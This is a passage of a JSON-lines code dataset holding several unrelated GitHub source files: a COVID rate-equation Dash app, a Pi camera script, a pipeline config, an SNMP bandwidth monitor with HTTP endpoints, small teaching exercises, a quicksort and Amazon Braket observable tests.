update_infection(value):\n return 'Genesungsrate: {}'.format(round(value, 2))\n\n\n@app.callback(\n Output('mortality-label', 'children'),\n [Input('mortality-slider', 'value')]\n)\ndef update_infection(value):\n return 'Mortalität: {}%'.format(round(value, 1))\n\n\n@app.callback(\n Output('figure', 'figure'),\n [Input('reload-button', 'n_clicks'),\n Input('infection-slider', 'value'),\n Input('recovery-slider', 'value'),\n Input('mortality-slider', 'value'),\n Input('initial-input', 'value'),\n Input('corona-data', 'modified_timestamp'),\n Input('population-data', 'modified_timestamp'),\n Input('country-dropdown', 'value')],\n [State('range-slider', 'value'),\n State('corona-data', 'data'),\n State('population-data', 'data')]\n)\ndef update_figure(clicks, infection_rate, recovery_rate, mortality, infected_0,\n corona_ts, population_ts, country, fit_range, corona_data, population_data):\n if corona_ts is None:\n raise PreventUpdate\n data = pd.read_json(corona_data)\n data_country = data.set_index('Country/Region').loc[country]\n data_country = data_country.set_index('Date')\n dates = data_country.index.dayofyear - data_country.index.dayofyear[0]\n population = pd.read_json(population_data, typ='series').loc[country]\n dates_fit = np.linspace(fit_range[0], fit_range[1], 50)\n\n infected, recovered, deaths = logistic_function(\n dates_fit, infection_rate=infection_rate, recover_rate=recovery_rate, mortality=mortality/100,\n infected_0=infected_0/population\n )\n\n return {\n 'data': [\n {'x': dates_fit, 'y': population * infected, 'type': 'line', 'name': 'Infizierte'},\n {'x': dates_fit, 'y': population * recovered, 'type': 'line', 'name': 'Genesene'},\n {'x': dates_fit, 'y': population * deaths, 'type': 'line', 'name': 'Verstorbene'},\n go.Scatter(x=dates, y=data_country['Active Cases'], name='Infizierte',\n mode='markers', marker_color=COLORS[0]),\n go.Scatter(x=dates, y=data_country['Total Recoveries'], name='Genesene',\n mode='markers', marker_color=COLORS[1]),\n go.Scatter(x=dates, y=data_country['Total Deaths'], name='Verstorbene',\n mode='markers', marker_color=COLORS[2])\n ],\n 'layout': dict(\n xaxis={'title': 'Zeit'},\n yaxis={'title': 'Prozent'},\n margin={'l': 40, 'b': 40, 't': 10, 'r': 10},\n hovermode='closest',\n transition={'duration': 500},\n )\n }\n\n\nif __name__ == '__main__':\n app.run_server(debug=True)\n","repo_name":"titusfranz/Corona_dash_rate_equation","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":15200,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20299594727","text":"import picamera\nimport time\nfrom fractions import Fraction\n\ncamera = picamera.PiCamera()\n\n#camera.framerate = Fraction(1, 6)\n#camera.shutter_speed = 6000000\n#camera.exposure_mode = 'off'\n\ncamera.iso = 800\ncamera.ISO = 400\n\n\ncamera.vflip = True\ncamera.hflip = True\ncamera.brightness = 70\n#time.sleep(10)\ncamera.contrast = 50\ncamera.capture('image.jpg')\n","repo_name":"capalmer1013/camera","sub_path":"takePicture.py","file_name":"takePicture.py","file_ext":"py","file_size_in_byte":352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16317418078","text":"from collections import OrderedDict\n\nVERSION = \"0.11.1\"\n\n# A list of the paths used in the pipeline:\n\n# for testing \nPIPE_PATH = \"/home/ubuntu/server_side/\"\nOUT_FOLDER = \"/gpfs/res_projects/cvcv/webserver/users/\"\n\n# for stable\n#PIPE_PATH = \"/var/genorama/server_side/stable/\"\n#OUT_FOLDER = \"/gpfs/res_projects/cvcv/webserver/users/\"\n\nCOMMAND_PATH = PIPE_PATH + \"commands/\"\nPY_BIOLIB_PATH = \"/gpfs/res_projects/cvcv/webserver/lib/\"\n\nBLAST_DB_FOLDER = \"/gpfs/res_projects/cvcv/webserver/seq_dbs/\"\nHMMER_PROFILE_FOLDER = \"/gpfs/res_projects/cvcv/webserver/seq_dbs/HMM_profiles/\"\n\n# put true to remove \"unecessary\" files for the user\nMINIMAL_OUTPUT=\"TRUE\"\n\n# File system used\nFILE_SYSTEM= \"gpfs\"\n# Docker\n\nDOCKER_CLEANING=\"mycleaning\"\nDOCKER_ASSEMBLY=\"myassembly\"\nDOCKER_IDENTIFY=\"myidentification\"\n\n# Logging:\nLOGFILEBYTES = 500*1024\n# For testing:\nLOGFILE=\"/home/ubuntu/server_side/trufa_pipe.log\"\n\n# For stable\n#LOGFILE=\"/var/genorama/log/trufa_pipe.log\"\n\n\n# For stable:\n\n# IDEA TO HAVE ALL JOB PARA IN A DICT BUT PROBLEM TO ASSIGN READS_FILES_COUNT and ENV\n#JOBS_PARAMS = OrderedDict( [ (\"FASTQC1\", [\"fastqc\", \"cleaning/fastqc.cmd\", None, \"2\", \"03:00:00\", None ,\"STAT/fastqc_report\" ] ) ] )\n\n","repo_name":"laramaktub/TRUFA","sub_path":"lib/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1192,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3090276511","text":"import os\nimport sys\nimport subprocess\nimport traceback\nimport time\nimport re\n\nsys.path.append(\"../mie\")\n\nfrom confcenter import XConfCenter\nimport miethread\n\nfrom logtan import logtan_mongodb as logtan\nfrom singleton import AppSingleton, ClsSingleton\n\nfrom bprint import varprt, varfmt\nfrom dotdict import DotDict\nfrom xlogger import klog\nfrom deferdo import DeferDo\nfrom maptan import MapTan\nfrom kstat import kstat, kstatone\nfrom logmon import KLogMon\nfrom snmpoper import SnmpOper as sop, oid as soid\n\nimport pymongo\nclient = pymongo.MongoClient()\ndb = client.snmp\n\n\n\n### ###########################################################\n## Singleton and klog\n#\nAppSingleton(\"/tmp/snmp.pid\", \"Singleton check failed: snmp already exists\")\n\n### ###########################################################\n## Read default configuration\n#\n\nalias = (\n (\"CMDPORT\", \"cmdport\", 9020),\n (\"DEBUG\", \"debug\", True),\n )\n\nconf = XConfCenter(group=\"snmp\", rw_cfg=\"./snmp.cfg\", alias=alias)\nKLogMon(conf)\n\n\n### #####################################################################\n## Globals\n#\n\noid_static = set([\n \"ifIndex\",\n \"ifDescr\",\n \"ifType\",\n \"ifSpeed\",\n \"ifHighSpeed\",\n \"ifPhysAddress\",\n \"ifAdminStatus\",\n \"ifOperStatus\",\n ])\n\noid_runtime = set([\n # \"ifInOctets\",\n # \"ifHCInOctets\",\n # \"ifInUcastPkts\",\n # \"ifInNUcastPkts\",\n # \"ifInDiscards\",\n # \"ifInErrors\",\n # \"ifInUnknownProtos\",\n # \"ifOutOctets\",\n \"ifHCOutOctets\",\n # \"ifOutUcastPkts\",\n # \"ifOutNUcastPkts\",\n # \"ifOutDiscards\",\n # \"ifOutErrors\",\n # \"ifOutQLen\",\n])\n\n\n### #####################################################################\n## Used to fast access port via some critiria\n#\n\n# ipaddr <=> port\ng_port_fr_ipaddr = MapTan(lambda *a: str(a[0]))\n\n# loopback + ifIndex <=> port\ng_port_fr_ifindex = MapTan(lambda *a: \"%s@%s\" % (a[1], a[0]))\n\n# ipaddr <=> setport\ng_setport_fr_ip = MapTan(lambda *a: str(a[0]))\n\n# portUid <=> setport\ng_setport_fr_uid = MapTan(lambda *a: str(a[0]))\n\n# All routes\n# {loopback: DotDict}\ng_routers = {}\n\n\n### #####################################################################\n## Router\n#\nclass Router(DotDict):\n #__metaclass__ = ClsSingleton\n\n def __init__(self, oid_static, oid_runtime, host, comm=\"ctbri\", vern=\"2c\", **kwargs):\n # kwargs: other fields of a router\n self.ports = {}\n\n self.oid = {\"static\": oid_static, \"runtime\": oid_runtime}\n\n self.host = host # ip_str\n self.comm = comm # community\n self.vern = vern # version\n\n for k, v in kwargs.items():\n self[k] = v\n\n def load_runtime(self, inf):\n oids = self.oid.get(\"runtime\", [])\n if not oids:\n return\n\n oldrti = inf.get(\"rti\", DotDict())\n tmprti = DotDict()\n\n newinf = DotDict()\n tmprti[\"old\"] = oldrti.get(\"new\", DotDict())\n tmprti[\"new\"] = newinf\n\n newinf[\"time\"] = time.time()\n\n host = inf[\"__loopback__\"]\n comm = inf[\"__snmp_comm__\"]\n vern = inf[\"__snmp_vern__\"]\n\n for name in oids:\n oid = soid.get(name) + \".\" + str(inf.ifIndex)\n try:\n _, _, value = sop.get(host, comm, vern, oid)\n newinf[name] = value\n except:\n traceback.print_exc()\n pass\n\n inf[\"rti\"] = tmprti\n\n def load_static(self):\n '''Collector information according to router's information'''\n\n host, comm, vern = self.host, self.comm, self.vern\n\n lines = sop.walk(host, comm, vern, soid.ipAdEntIfIndex)\n for line in lines:\n port_ipaddr, _, port_index = sop.splitline(\n line, soid.ipAdEntIfIndex)\n if not port_ipaddr:\n continue\n\n # XXX: ifindex number maybe same across different routers\n inf = DotDict()\n self.ports[port_index] = inf\n\n inf[\"__loopback__\"] = host\n inf[\"__snmp_comm__\"] = comm\n inf[\"__snmp_vern__\"] = vern\n inf[\"__ipaddr__\"] = port_ipaddr\n\n oids = self.oid.get(\"static\", [])\n for name in oids:\n oid = soid.get(name) + \".\" + str(port_index)\n try:\n _, _, value = sop.get(host, comm, vern, oid)\n inf[name] = value\n except:\n traceback.print_exc()\n pass\n\n def load(self):\n if not self.ports:\n klog.d(\"load static for: %s\" % self.host)\n self.load_static()\n\n klog.d(\"load runtime for: %s\" % self.host)\n for p in self.ports.values():\n self.load_runtime(p)\n\ndef load_router(equip):\n loopback = equip.get(\"ip_str\")\n if not loopback:\n return\n\n r = Router(oid_static, oid_runtime, loopback, **equip)\n r.load()\n g_routers[loopback] = r\n\n for p in r.ports.values():\n g_port_fr_ipaddr.set(p, p.__ipaddr__)\n g_port_fr_ifindex.set(p, p.__loopback__, p.ifIndex)\n\n\n# Scan all given routers\ndef load_routers(ips):\n global g_routers, g_port_fr_ipaddr, g_port_fr_ifindex\n\n g_routers = {}\n g_port_fr_ipaddr.clr()\n g_port_fr_ifindex.clr()\n\n for loopback in ips:\n d = DotDict()\n d.ip_str = loopback\n d.community = \"ctbri\"\n d.vern = \"2c\"\n d.name = \"Equip@%s\" % loopback\n d.uid = loopback\n d.vendor = \"FIXME\"\n\n load_router(d)\n\n\nclass Collector(miethread.MieThread):\n '''Thread pool to get data from snmp or netconf'''\n __metaclass__ = ClsSingleton\n\n def load_each(self, r):\n klog.d(\"Loading ...:\", r.host)\n r.load()\n\n def update(self):\n '''Scan mango and generate ifindex number and port ipaddr'''\n for r in g_routers.values():\n DeferDo(self.load_each, r)\n\n def __init__(self, name=\"SnmpCollector\"):\n klog.d(\"INTO Collector\")\n miethread.MieThread.__init__(self, name=name)\n self.start()\n\n def act(self):\n '''Fetch and save to db'''\n\n klog.d(\"Collector, acting...\")\n self.update()\n return 10\n\nsnmpCollector = Collector()\n\n\n\n### ###########################################################\n## Bottle: Request and Response\n#\n\nfrom bottle import get, post, put, run, request\nimport json\n\ndef idic():\n try:\n payload = request.body.read() or \"{}\"\n dic = json.JSONDecoder().decode(payload)\n dic = DotDict(**dic)\n return dic\n except:\n traceback.print_exc()\n return DotDict()\n\n\ndef odic(indic):\n odic = DotDict()\n\n odic.response = indic.request\n odic.trans_id = indic.trans_id\n odic.ts = time.strftime(\"%Y%m%d%H%M%S\")\n\n odic.result = DotDict()\n\n odic.err_code = 0\n odic.msg = None\n\n return odic\n\n# request_name <> func\ng_cmdmap = DotDict()\n\ndef cmd_default(calldic=None):\n return \"Bad request '%s'\" % calldic.request\ng_cmdmap.default = cmd_default\n\n@post(\"/link/links\")\ndef docmd_ms_link_links():\n calldic = idic()\n klog.d(varfmt(calldic, \"calldic\"))\n return g_cmdmap.get(calldic.request, \"default\")(calldic)\n\ndef ms_link_set_links(calldic=None):\n '''\n {\n \"args\": {\n \"equips\": [\n {\n \"community\": \"ctbri\",\n \"ip_str\": \"11.11.11.11\",\n \"name\": \"PE11_ALU\",\n \"ports\": [\n {\n \"capacity\": 1000,\n \"if_index\": 2,\n \"if_name\": \"ALU 1/1/1\",\n \"ip_str\": \"10.0.111.11\",\n \"mac\": \"00-00-0A-00-6F-0B\",\n \"type\": 1,\n \"uid\": \"3\"\n },\n {\n \"capacity\": 1000,\n \"if_index\": 3,\n \"if_name\": \"ALU 1/1/2\",\n \"ip_str\": \"10.0.114.11\",\n \"mac\": \"00-00-0A-00-72-0B\",\n \"type\": 0,\n \"uid\": \"13\"\n \"__associated_port__\": 3\n }\n ],\n \"uid\": \"2\",\n \"vendor\": \"ALU\",\n \"x\": 115.0,\n \"y\": 150.0\n },\n ],\n },\n \"request\": \"ms_flow_set_topo\",\n }\n '''\n calldic = calldic or idic()\n\n db.ports.drop()\n\n db.equips.drop()\n equips = calldic[\"args\"].get(\"equips\", [])\n for r in equips:\n ports = r[\"ports\"]\n del r[\"ports\"]\n\n DeferDo(load_router, r)\n\n r[\"_id\"] = r[\"ip_str\"]\n db.equips.replace_one({\"_id\": r[\"_id\"]}, dict(r), True)\n\n for p in ports:\n p[\"_id\"] = \"%s@%s\" % (p[\"ip_str\"], r[\"ip_str\"])\n p[\"router\"] = r[\"ip_str\"]\n db.ports.replace_one({\"_id\": p[\"_id\"]}, dict(p), True)\n\n g_setport_fr_ip.set(p, p.ip_str)\n g_setport_fr_uid.set(p, p.uid)\n\n db.vlinks.drop()\n vlinks = calldic[\"args\"].get(\"vlinks\", [])\n for l in vlinks:\n port = db.ports.find_one({\"uid\": l[\"sport\"]})\n if port:\n port[\"bandwidth\"] = l.get(\"bandwidth\")\n db.ports.replace_one({\"_id\": port[\"_id\"]}, dict(port), True)\n\n respdic = odic(calldic)\n res = json.dumps(respdic)\n\n # TODO: Save new information to db\n snmpCollector.wakeup()\n return res\n\ng_cmdmap.ms_link_set_links = ms_link_set_links\n\nclass SizeConv():\n @classmethod\n def tos(cls, size, unit=None, fp=False, pre=0):\n '''toStr: 1234213412 => 1234213B => 1234KB => 1MB'''\n\n if unit in 'kK':\n size = float(size) / 1024\n elif unit in 'mM':\n size = float(size) / 1024 / 1024\n elif unit in 'gG':\n size = float(size) / 1024 / 1024 / 1024\n elif unit in 'tT':\n size = float(size) / 1024 / 1024 / 1024 / 1024\n elif unit in 'pP':\n size = float(size) / 1024 / 1024 / 1024 / 1024 / 1024\n else:\n size = float(size)\n\n if fp:\n pat = \"{:.%df}\" % pre if pre else \"{:f}\"\n return pat.format(size)\n else:\n return int(size)\n\n\n @classmethod\n def frs(cls, size, fp=False):\n '''frStr: 34712384K => 34712384*1024'''\n\n if not size:\n return 0\n\n size = size.strip()\n\n if size[-1] in 'kK':\n size = float(size[:-1]) * 1024\n elif size[-1] in 'mM':\n size = float(size[:-1]) * 1024 * 1024\n elif size[-1] in 'gG':\n size = float(size[:-1]) * 1024 * 1024 * 1024\n elif size[-1] in 'tT':\n size = float(size[:-1]) * 1024 * 1024 * 1024 * 1024\n elif size[-1] in 'pP':\n size = float(size[:-1]) * 1024 * 1024 * 1024 * 1024 * 1024\n else:\n size = float(size)\n\n return size if fp else int(size)\n\nsc = SizeConv()\n\n\nconf.alias(\"NETUSE_DEBUG\", \"netuse/debug\", True)\ndef netusage(asc=True):\n out = []\n for r in g_routers.values():\n for p in r.ports.values():\n klog.d(varfmt(p, \"NetUsage\", True))\n try:\n\n d = DotDict()\n\n ipaddr = p.get(\"__ipaddr__\")\n dbport = db.ports.find_one({\"ip_str\": ipaddr})\n if not dbport:\n klog.e(\"Port (%s) not found\" % ipaddr)\n if not conf.NETUSE_DEBUG:\n continue\n else:\n d.port_uid = dbport.get(\"uid\")\n d.if_name = dbport.get(\"if_name\")\n\n d[\"__obj_db__\"] = dbport\n\n\n new = int(p.rti.new.ifHCOutOctets)\n old = int(p.rti.old.ifHCOutOctets)\n\n diff_bytes = new - old\n\n diff_seconds = p.rti.new.time - p.rti.old.time\n bw_in_bytes = int(p.ifHighSpeed) * 1000000 / 8\n\n d.utilization = 100.0 * diff_bytes / diff_seconds / bw_in_bytes\n\n d.__diff_seconds = diff_seconds\n\n b = sc.tos(diff_bytes, \"b\", False, 3)\n k = sc.tos(diff_bytes, \"k\", True, 3)\n m = sc.tos(diff_bytes, \"m\", True, 3)\n g = sc.tos(diff_bytes, \"g\", True, 3)\n text = \"%sB or %sK or %sM or %sG Bytes\" % (b, k, m, g)\n d.__diff_size = text\n\n b = sc.tos(bw_in_bytes, \"b\", False, 3)\n k = sc.tos(bw_in_bytes, \"k\", True, 3)\n m = sc.tos(bw_in_bytes, \"m\", True, 3)\n g = sc.tos(bw_in_bytes, \"g\", True, 3)\n text = \"%sB or %sK or %sM or %sG Bytes\" % (b, k, m, g)\n d.__bandwidth = text\n\n d.ip = p.__ipaddr__\n d.loopback = p.__loopback__\n\n setp = g_setport_fr_ip.get(d.ip)\n if setp:\n d.port_uid = setp.uid\n d.if_name = setp.if_name\n\n out.append(d)\n except:\n continue\n\n mul = 10000000000 if asc else -10000000000\n return sorted(out, lambda x, y: int(mul * (x.utilization - y.utilization)))\n\n\ndef ms_link_get_status(calldic=None):\n '''\n The request:\n {\n \"args\": {},\n \"request\": \"ms_link_get_status\",\n \"trans_id\": 1464244693,\n \"ts\": \"20160526143813\"\n }\n response:\n {\n \"err_code\": 0,\n \"msg\": \"Demo response\",\n \"response\": \"ms_link_get_status\",\n \"result\": {\n \"utilization\": [\n {\n \"port_uid\": \"1000_0\",\n \"utilization\": 107.2\n },\n {\n \"port_uid\": \"1000_2\",\n \"utilization\": 259.8\n }\n ]\n },\n \"trans_id\": 1464244693,\n \"ts\": \"20160526143813\"\n }\n '''\n\n calldic = calldic or idic()\n respdic = odic(calldic)\n\n respdic.result.utilization = netusage(False)\n\n return json.dumps(respdic)\n\ng_cmdmap.ms_link_get_status = ms_link_get_status\n\n\ndef ms_link_set_tunnel(calldic=None):\n '''\n The request:\n {\n \"args\": {\n \"tunnels\": [\n {\n \"bandwidth\": 1000,\n \"from_router_name\": \"\",\n \"from_router_uid\": \"router0\",\n \"name\": \"Microhard_0\",\n \"path\": [\n {},\n {}\n ],\n \"to_router_name\": \"\",\n \"to_router_uid\": \"router4\",\n \"uid\": \"lsp_0\",\n \"user_data\": \"xxx\"\n }\n ]\n },\n \"request\": \"ms_link_set_tunnel\",\n \"trans_id\": 1464244693,\n \"ts\": \"20160526143813\"\n }\n response:\n {\n }\n '''\n\n calldic = calldic or idic()\n respdic = odic(calldic)\n return json.dumps(respdic)\n\ng_cmdmap.ms_link_set_tunnel = ms_link_set_tunnel\n\n\ndef ms_link_get_tunnel_bw(calldic=None):\n '''\n The request:\n {\n \"args\": {},\n \"request\": \"ms_link_get_tunnel_bw\",\n \"trans_id\": 1464244693,\n \"ts\": \"20160526143813\"\n }\n response:\n {\n \"err_code\": 0,\n \"msg\": \"Demo response\",\n \"response\": \"ms_link_get_tunnel_bw\",\n \"result\": {\n \"tunnel_bw\": [\n {\n \"cur_bw\": \"yyy\",\n \"tunnel_uid\": \"xxx\"\n }\n ]\n },\n \"trans_id\": 1464244693,\n \"ts\": \"20160526143813\"\n }\n '''\n calldic = calldic or idic()\n respdic = odic(calldic)\n return json.dumps(respdic)\n\ng_cmdmap.ms_link_get_tunnel_bw = ms_link_get_tunnel_bw\n\n### #####################################################################\n## mcon etc\n#\nfrom roar.roar import CallManager, CmdServer_Socket\nfrom roar import roarcmds\n\ncallman = CallManager(name=\"SNMP\")\ncmdserv = CmdServer_Socket(callman, conf.CMDPORT)\ncmdserv.start()\n\nroarcmds.ExtCommands(callman, conf)\n\n\n@callman.deccmd()\ndef pl(cmdctx, calldic):\n '''Port List\n\n .opt -i byIpAddr\n .opt -l byLoopback\n .opt -as byAdminState\n Query by state, 1 for up, others for down\n .opt -os byOperState\n Query by state, 1 for up, others for down\n .opt --s pat :.*\n Use re to filter out the wanted port.\n\n TODO: should and --include and --exclude option.\n TODO: should and --include and --exclude option.\n TODO: should and --include and --exclude option.\n TODO: should and --include and --exclude option.\n '''\n ports = []\n args = calldic.get_args() or []\n\n pat = calldic.nth_opt(\"s\", 0, \".*\")\n pat = re.compile(pat)\n\n if calldic.get_opt(\"i\"):\n field = \"__ipaddr__\"\n elif calldic.get_opt(\"l\"):\n field = \"__loopback__\"\n elif calldic.get_opt(\"as\"):\n field = \"ifAdminStatus\"\n elif calldic.get_opt(\"os\"):\n field = \"ifOperStatus\"\n else:\n field = \"__ipaddr__\"\n\n for r in g_routers.values():\n for p in r.ports.values():\n if not args or str(p[field]) in args:\n ports.append(p)\n\n res = [p for p in ports if pat.search(str(p))]\n return res\n\n\n@callman.deccmd()\ndef rl(cmdctx, calldic):\n '''Routers List\n\n .opt --s searchpat :.*\n '''\n lis = []\n args = calldic.get_args() or []\n\n pat = calldic.nth_opt(\"s\", 0, \".*\")\n pat = re.compile(pat)\n\n for r in g_routers.values():\n if not args or r.host in args:\n lis.append(r)\n\n res = [r for r in lis if pat.search(str(r))]\n return res\n\n\n@callman.deccmd()\ndef rload(cmdctx, calldic):\n '''Routers load'''\n for r in g_routers.values():\n r.load()\n return \"OK\"\n\n\n@callman.deccmd()\ndef util(cmdctx, calldic):\n '''Bandwidth usage\n\n Show Bandwidth usage.\n a. aaaaaaaaaaaa\n b. aaaaaaaaaaaa\n\n .opt --s searchPat :.*\n .arg count\n\n\n\n\n How many count should be returned.\n How many count should be returned.\n\n\n How many count should be returned.\n How many count should be returned.\n\n\n\n .arg fake\n Show this part\n\n .arg fake2\n\n\n\n\n '''\n cnt = calldic.nth_arg(0) or 1000000\n cnt = int(cnt)\n\n pat = calldic.nth_opt(\"s\", 0, \".*\")\n pat = re.compile(pat)\n\n utils = netusage(False)\n\n res = [i for i in utils if pat.search(str(i))]\n return res[:cnt]\n\n@callman.deccmd()\ndef iplist(cmdctx, calldic):\n '''Show all ip address return by scan operation'''\n ips = []\n for r in g_routers.values():\n ips.extend([p[\"__ipaddr__\"] for p in r.ports.values()])\n return sorted(ips, lambda x,y: int(x.split(\".\")[0]) - int(y.split(\".\")[0]))\n\n\nif __name__ == \"__main__\":\n # map(lambda x: klog.d(\"#\" * x), range(10, 100, 10))\n ips = sys.argv[1:]\n if ips:\n load_routers(ips)\n topo_scan(g_routers)\n else:\n ips = []\n for dic in db.equips.find({}, {\"_id\": 0, \"ip_str\": 1, \"community\": 1}):\n ips.append(dic.get(\"ip_str\"))\n load_routers(ips)\n\n run(server='paste', host='0.0.0.0', port=10000, debug=True)\n\n","repo_name":"open-o/sdno-monitoring","sub_path":"sdno-link-monitor/snmp/snmp.py","file_name":"snmp.py","file_ext":"py","file_size_in_byte":19072,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33519395201","text":"def bintang(n):\n i = 0\n while(iDone!

    \"","repo_name":"alifattahi/mysql-materialized","sub_path":"seeder.py","file_name":"seeder.py","file_ext":"py","file_size_in_byte":1190,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"40490207304","text":"#PENJUMLAHAN LIST \n\ndata_a = []\ndata_b = []\njumlah = []\npanjang = 0\n\nukuran = int(input(\"Masukkan ukuran list ke- 1 = \"))\nfor i in range(ukuran):\n print(\"Masukkan data yang ke-\",i,\": \",end='')\n list1 = int(input())\n data_a.append(list1)\n \nukuran1 = int(input(\"Masukkan ukuran list ke- 2 = \"))\nfor i in range(ukuran1):\n print(\"Masukkan data yang ke-\",i,\": \",end='')\n list2 = int(input())\n data_b.append(list2)\n\nif len(data_a) > len(data_b):\n panjang= len(data_a)\nelse:\n panjang = len(data_b)\n\nfor i in range(panjang):\n if len(data_a) < len(data_b):\n data_b.append(0)\n elif len(data_b) > len(data_a):\n data_a.append(0)\n total = data_a[i]+ data_b[i]\n jumlah.append(total)\n\nprint('List Pertama=',data_a[0:ukuran])\nprint('List Kedua=',data_b[0:ukuran1])\nprint('Hasil Penjumlahan=',jumlah)\n","repo_name":"dewialqurani/ALPRO_SEMESTER1","sub_path":"LATIHAN MODUL BU INDAH/modul 5 penjumlahan list.py","file_name":"modul 5 penjumlahan list.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33403138776","text":"def partition(l, r, arr):\r\n\r\n pivot, ptr = arr[r], l\r\n for i in range(l, r):\r\n if arr[i] <= pivot:\r\n\r\n arr[i], arr[ptr] = arr[ptr], arr[i]\r\n ptr += 1\r\n print(arr)\r\n\r\n arr[ptr], arr[r] = arr[r], arr[ptr]\r\n\r\n return ptr\r\n\r\n\r\ndef quicksort(l, r, arr):\r\n if len(arr) == 1:\r\n return arr\r\n\r\n if l < r:\r\n pivot = partition(l, r, arr)\r\n quicksort(l, pivot - 1, arr)\r\n quicksort(pivot + 1, r, arr)\r\n return arr\r\n\r\n\r\nexample = [4, 5, 1, 2, 3]\r\nresult = [1, 2, 3, 4, 5]\r\nprint(quicksort(0, len(example) - 1, example))","repo_name":"Sarveshk76/Interview-Questions","sub_path":"Quick sort.py","file_name":"Quick sort.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23644808784","text":"import math\n\nimport numpy as np\nimport numpy.testing as npt\nimport pytest\n\nfrom braket.circuits import Gate, Observable\nfrom braket.circuits.observables import observable_from_ir\nfrom braket.circuits.quantum_operator_helpers import get_pauli_eigenvalues\nfrom braket.circuits.serialization import (\n IRType,\n OpenQASMSerializationProperties,\n QubitReferenceType,\n)\n\ntestdata = [\n (Observable.I(), Gate.I(), [\"i\"], (), np.array([1, 1])),\n (Observable.X(), Gate.X(), [\"x\"], tuple([Gate.H()]), get_pauli_eigenvalues(1)),\n (\n Observable.Y(),\n Gate.Y(),\n [\"y\"],\n tuple([Gate.Z(), Gate.S(), Gate.H()]),\n get_pauli_eigenvalues(1),\n ),\n (Observable.Z(), Gate.Z(), [\"z\"], (), get_pauli_eigenvalues(1)),\n (Observable.H(), Gate.H(), [\"h\"], tuple([Gate.Ry(-math.pi / 4)]), get_pauli_eigenvalues(1)),\n]\n\ninvalid_hermitian_matrices = [\n (np.array([[1]])),\n (np.array([1])),\n (np.array([0, 1, 2])),\n (np.array([[0, 1], [1, 2], [3, 4]])),\n (np.array([[0, 1, 2], [2, 3]], dtype=object)),\n (np.array([[0, 1, 2], [3, 4, 5], [6, 7, 8]])),\n (Gate.T().to_matrix()),\n]\n\n\n@pytest.mark.parametrize(\n \"testobject,gateobject,expected_ir,basis_rotation_gates,eigenvalues\", testdata\n)\ndef test_to_ir(testobject, gateobject, expected_ir, basis_rotation_gates, eigenvalues):\n expected = expected_ir\n actual = testobject.to_ir()\n assert actual == expected\n\n\n@pytest.mark.parametrize(\n \"observable, serialization_properties, target, expected_ir\",\n [\n (\n Observable.I(),\n OpenQASMSerializationProperties(qubit_reference_type=QubitReferenceType.VIRTUAL),\n [3],\n \"i(q[3])\",\n ),\n (\n Observable.I(),\n OpenQASMSerializationProperties(qubit_reference_type=QubitReferenceType.PHYSICAL),\n [3],\n \"i($3)\",\n ),\n (\n Observable.I(),\n OpenQASMSerializationProperties(qubit_reference_type=QubitReferenceType.VIRTUAL),\n None,\n \"i all\",\n ),\n (\n Observable.X(),\n OpenQASMSerializationProperties(qubit_reference_type=QubitReferenceType.VIRTUAL),\n [3],\n \"x(q[3])\",\n ),\n (\n Observable.X(),\n OpenQASMSerializationProperties(qubit_reference_type=QubitReferenceType.PHYSICAL),\n [3],\n \"x($3)\",\n ),\n (\n Observable.X(),\n OpenQASMSerializationProperties(qubit_reference_type=QubitReferenceType.VIRTUAL),\n None,\n \"x all\",\n ),\n (\n Observable.Y(),\n OpenQASMSerializationProperties(qubit_reference_type=QubitReferenceType.VIRTUAL),\n [3],\n \"y(q[3])\",\n ),\n (\n Observable.Y(),\n OpenQASMSerializationProperties(qubit_reference_type=QubitReferenceType.PHYSICAL),\n [3],\n \"y($3)\",\n ),\n (\n Observable.Y(),\n OpenQASMSerializationProperties(qubit_reference_type=QubitReferenceType.VIRTUAL),\n None,\n \"y all\",\n ),\n (\n Observable.Z(),\n OpenQASMSerializationProperties(qubit_reference_type=QubitReferenceType.VIRTUAL),\n [3],\n \"z(q[3])\",\n ),\n (\n Observable.Z(),\n OpenQASMSerializationProperties(qubit_reference_type=QubitReferenceType.PHYSICAL),\n [3],\n \"z($3)\",\n ),\n (\n Observable.Z(),\n OpenQASMSerializationProperties(qubit_reference_type=QubitReferenceType.VIRTUAL),\n None,\n \"z all\",\n ),\n (\n Observable.H(),\n OpenQASMSerializationProperties(qubit_reference_type=QubitReferenceType.VIRTUAL),\n [3],\n \"h(q[3])\",\n ),\n (\n Observable.H(),\n OpenQASMSerializationProperties(qubit_reference_type=QubitReferenceType.PHYSICAL),\n [3],\n \"h($3)\",\n ),\n (\n Observable.H(),\n OpenQASMSerializationProperties(qubit_reference_type=QubitReferenceType.VIRTUAL),\n None,\n \"h all\",\n ),\n (\n Observable.Hermitian(np.eye(4)),\n OpenQASMSerializationProperties(qubit_reference_type=QubitReferenceType.VIRTUAL),\n [1, 2],\n \"hermitian([[1+0im, 0im, 0im, 0im], [0im, 1+0im, 0im, 0im], \"\n \"[0im, 0im, 1+0im, 0im], [0im, 0im, 0im, 1+0im]]) q[1], q[2]\",\n ),\n (\n Observable.Hermitian(np.eye(4)),\n OpenQASMSerializationProperties(qubit_reference_type=QubitReferenceType.PHYSICAL),\n [1, 2],\n \"hermitian([[1+0im, 0im, 0im, 0im], [0im, 1+0im, 0im, 0im], \"\n \"[0im, 0im, 1+0im, 0im], [0im, 0im, 0im, 1+0im]]) $1, $2\",\n ),\n (\n Observable.Hermitian(np.eye(2)),\n OpenQASMSerializationProperties(qubit_reference_type=QubitReferenceType.VIRTUAL),\n None,\n \"hermitian([[1+0im, 0im], [0im, 1+0im]]) all\",\n ),\n (\n Observable.H() @ Observable.Z(),\n 